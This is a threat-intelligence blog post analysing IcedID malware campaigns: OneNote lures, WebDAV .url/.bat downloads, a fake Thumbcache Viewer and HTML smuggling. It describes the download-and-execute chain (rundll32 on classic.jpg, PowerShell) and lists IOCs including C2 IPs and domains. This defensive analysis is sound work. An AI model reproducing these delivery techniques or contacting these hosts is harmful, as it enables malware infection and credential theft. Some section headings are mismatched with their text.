The many faces of the IcedID attack kill chain

Menlo Labs

March 25, 2023

Executive Summary

The Menlo Labs Team noticed some very interesting and seemingly overlapping IcedID campaigns over the past couple of months. IcedID is a modular trojan that made its appearance in 2017, and since then it’s proven itself to be one the most notorious pieces of malware. In this blog we will briefly touch on the different IcedID campaigns we have been tracking including:

Malicious OneNote campaign
.url files using webdav protocol campaign
Thumbcache viewer campaign
HTML smuggling campaigns

Threat intelligence

The attack chain of the IcedID malware is a multi-stage process that begins with malicious actors sending out phishing emails, fake Zoom installers, malicious .one files, or malvertising campaigns. The emails often contain links or attachments that lead to websites hosting malicious payloads, such as OneNote files, JavaScript files, Visual Basic Script (VBS) files, and executables (EXEs). Once opened by the victim, they download additional components from command-and-control (C2) servers controlled by attackers.

OneNote Threat Campaign

In addition, at the end of December 2022, this malware was found leveraging Google pay-per-click ads in malvertising attacks – an online advertising practice wherein bad actors use deceptive or malicious advertisements to spread malware. Threat actors use these ads to lead victims to domains containing scripts used for infection purposes, leveraging compromised WordPress sites as a part of a redirector chain technique. The technique leads users back towards attackers’ intended destination while avoiding detection along the way.

comparison screenshots of real and malicious microsoft teams sites — *Which Microsoft Teams page is real?*

screenshot of malicious microsoft teams download site — *A malicious Microsoft Teams download site.*

We observed the attackers leveraging Search Engine Optimization (SEO) poisoning – a type of cyberattack that attempts to exploit SEO algorithms for malicious purposes – to promote compromised sites. It involves the manipulation of website content and code in order to raise its ranking on search engine results pages (SERPs). By leveraging SEO techniques, attackers can make their malicious sites appear more legitimate and desirable than they actually are, thereby steering unsuspecting users towards them – a technique we’ve termed Legacy URL Reputation Evasive (LURE). This technique can evade detection through a combination of technical and social engineering tactics, making it a challenging threat to identify and mitigate – which is why we categorize it as a Highly Evasive Adaptive Threat (HEAT). Menlo Labs has previously detailed an attack using SEO poisoning.

Malvertising is an online advertising practice wherein bad actors use deceptive or malicious advertisements to spread malware. This can happen through display ads, pop-ups, banners, links embedded within websites or emails, etc. Each will lead the user to download a malicious payload such as ransomware or spyware. Malvertising campaigns typically target the corporate populations. However, anyone who visits an infected site can be at risk, regardless of age or experience level.

Webdav protocol campaign

Also seen in December 2022, IcedID used OneNote as an attack vector by exploiting its file-sharing capabilities. The threat actors were able to upload malicious files such as scripts, EXEs and documents into OneNote pages, which then can be shared with potential victims. If the victims open the file and select the clickable icon, they will unknowingly trigger the download of these malicious files and unwittingly install IcedID onto their system. This kind of attack allows hackers to bypass traditional security measures since OneNote is generally deemed safe by antivirus software vendors.

The OneNote campaign went into February 2023 where we saw another IcedID campaign start. This one used .url files that retrieved a .bat file from an open directory WebDav file server. Both the .url and .bat files leverage Web Distributed Authoring and Versioning (WebDAV) to fetch and execute the malware. WebDAV comprises a series of HTTP protocol extensions that enable users to access and modify files stored on a remote web server.

Thumbcache viewer campaign

In March 2023, we saw some samples disguised as “Thumbcache Viewer”. Thumbcache Viewer allows you to extract thumbnail images from the thumbcache_.db and iconcache_.db database files found on Windows.

screenshot showing user account control dialog box for Thumbcache Viewer — *Sandbox picture of the malware being opened*

HTML smuggling campaigns

Prior to this, IcedID had been seen using HTML smuggling. In Oct 2022, IcedID was being delivered via phishing email with a HTML attachment. When users open and click on the decoy, they will download a password-protected zip file that contains a malicious ISO file.

Some unconfirmed reports stated IcedID is being used exclusively by Quantum Ransomware gang, however these recent infection chains have yet to reveal the end goal. Quantum Ransomware (which is made up of ex-Conti members) has been rebranded over the years. Starting out as MountLocker in June 2020, then renamed to AstroLocker and XingLocker before finally becoming Quantum. Knowing this, we can look at some past campaigns that involved IcedID, such as:

Quantum Ransomware - April 25, 2022 ISO/LNK campaign
Conti Ransomware - December 2021 Stolen Images Campaign Ends in Conti Ransomware
XingLocker Ransomware - October 18, 2021 IcedID to XingLocker Ransomware in 24 hours

Infection Vector/Technical Details

Once IcedID is loaded onto the victim’s system, it establishes persistence through registry manipulation techniques. It modifies browser settings to inject malicious content into legitimate web pages that were viewed by victims, which leads to further infection. It also injects scripts into existing processes for it to communicate with its C2 server without being detected. Finally, it can download other payloads such as ransomware or steal sensitive information like passwords from infected machines.

IcedID also has the ability to harvest stored credentials from web browsers, such as Chrome or Firefox, and use them for further attacks against other systems on the same network. It can also take screenshots of user activity and record keystrokes for potential password theft. The malware also attempts to disable security products, like anti-virus software or firewalls, so that it can remain undetected by IT teams who are attempting to combat its infections.

In a recent incident, an IcedID (that was mentioned above) WebDav file server was left open and you could see and grab the malicious files that were to be used in the attack. The threat actors use malicious Office documents containing links to URLs hosted in their own infrastructure, which then download secondary malware on the victim's machine.

screenshot of /webdav index — *IcedID fileserver was left open at time of analysis*

Also interesting in the Onenote IcedID campaign mentioned above is that malicious code is hidden in the Onenote file. That code is attempting to download an executable file (putty.exe) from an external source and execute it on the victims' computer (analyst comment: the sample reviewed errored out because the location it is saved to is over written later on in the code). It also attempts to hide its activity by resizing the window, moving it out of view, and closing it after 15 seconds.

Further down in the Onenote file is more code that attempts to download two files (classic.jpg and invoice.pdf) from a remote location and then execute them using PowerShell by bypassing certain security protocols on the user's computer. The createExecution function executes "rundll32" with "C:\Users\Public\classic.jpg,PluginInit" as an argument. It also sets up an alert() function that would be triggered when clicking on the "t" link, as well as resizes and moves the window it has been loaded in after loading the image with its alt tag containing a Powershell command. Finally, it automatically clicks on the "K" link 45 seconds after loading, likely to try and close itself afterwards so as not to leave any trace of being executed.

classic.jpg is a malicious executable and invoice.pdf is a decoy file to trick the user into thinking they downloaded a normal file.

onenote metadata showing malicious code — *OneNote meta data showing malicious code*

Also interesting is some meta data left in the malicious files, such as:

Some distinct markers for its campaigns:
unpaid_(numbers)-(Month)-03.one
File paths:
C:\Users\Admin\Desktop\htaLdr\cloudDocument.hta
C:\Users\Admin\Desktop\htaRevenge\lookAtThat.hta

Conclusion

Overall, IcedID uses various techniques ranging from targeting specific organizations to using advanced evasion techniques in order to gain access to systems undetected. This allows it to carry out nefarious activities before any security measures can intervene, making it one of most dangerous threats currently active today!

Download eBook: How cybercriminals use browser features to evade detection

IOCS

Icedid dll

fbad60002286599ca06d0ecb3624740efbf13ee5fda545341b3e0bf4d5348cfe

Icedid exe
691c03b4314dae901ea25fb7344c222dafc86a1f6faf8c74260025273faa0d60
0c55d0882696b478cd3a67db5b98e2cd99e2a9db84df8aacbf335f7f338b7c32
0d812ea13f68277b5146e04ba416d38cfb0281aaec36382982bc53db45144d0c
1134e24df540a5c996feeb1567960ea1df63467a78c909f53af01b0e5c800f5c
43ba07032ca007ed25935ef123c2d408b2f4fd1f0e428b5d03b58b476da336da
4df96ddc3dfdd7e1f03efb469d6dc56ca07ab1b3ecd07b8807f73774bcda135e
52532379bb2adee688abc443226a0d8e042ef9dd0ecb793c8d23ab3732ad83c0
7744af74d330b6ca17b7f63a71eca0bbda78a839e0e48e4db93a1d95d172a93f
977bfd5a732d15ff3a1406011ce0a7e5f62d018c73742ddb9a9a72b448933e7f
a015f40cfa1ca770c0c7fa901974ad6178f2b913659aea1486fcc307fd735e8e
ac316ce05faeb3f873911d78baf0cd9ee0a3c23d795c3d28c756bd9126911270
cf3ccda4faf8ee78a9d65cd7ac61283a170ef4b4f18054362c4cd2d6d3a52be8
d99a39acc8c3c918114ce151031b836a7df63d2e0f08c378199cf3ed9d2f9a42

onenote
dabefe4dfeb9340ccd77eb57d95f28058a86e0ebd75e514b60dc89f21d0222b2
0c49b5030b910b09c8575a09800a1bd085bd4d16f7c0bed8062d0257b43a56ed
fbad60002286599ca06d0ecb3624740efbf13ee5fda545341b3e0bf4d5348cfe
1a8aff6a30d3f57f75890e56168f6b2740f30d8058b3ea8970670d76f3df045a
c256d098c4f25d58245e005fe0d91a6ab4d3bb31d4bb119a65351bb6c6aa989b
7024a9859a5dba92870e4ef58e0dca2c75fa8dca0803cf10ce70136f3c5e9150
e52318ad812e5902f9bb75f47d040525a9e630f0e58f5729af7ed8cb22c86d4a
96b3b4816fbcfcf9de8bdd2e54b9293752eba4718ee616db9967949b6f320910
09c29bad8a5e25b853b3872c9cfb6609e5c15bd1a06d5127bd0789267906c973
0ee181ce1138e076f9ccac1601ae5b8357d9c2d378b313dce3b363a04687e2f0

216.73.159.132
216.73.159.134
216.73.159.29
216.73.159.44
216.73.159.60
216.73.159.80
135.148.217.85
5.196.196.252
80.66.88.71
157.254.195.65
38.180.0.89
37.252.6.77
80.78.24.3
hrowerknifi[.]com
neonmilkustaers[.]com
svoykbragudern[.]com
olifamagaznov[.]com
trbiriumpa[.]com
whothitheka[.]com
ebothlips[.]com
renomesolar[.]com
palasedelareforma[.]com
ehonlionetodo[.]com

Sources

https://thehackernews.com/2023/01/icedid-malware-strikes-again-active.html
https://www.cyber.nj.gov/alerts-advisories/new-icedid-campaign-distributes-malware-through-fake-zoom-installer
https://socprime.com/blog/icedid-botnet-detection-malvertising-attacks-abusing-google-pay-per-click-ppc-ads/
https://thedfirreport.com/category/icedid/
https://digitalguardian.com/blog/5-malware-families-use-malvertising
https://thehackernews.com/2023/01/icedid-malware-strikes-again-active.html
https://www.cyber.nj.gov/alerts-advisories/new-icedid-campaign-distributes-malware-through-fake-zoom-installer

Blog Category

Tagged

Blog

Research

Demo

The many faces of the IcedID attack kill chain

Executive Summary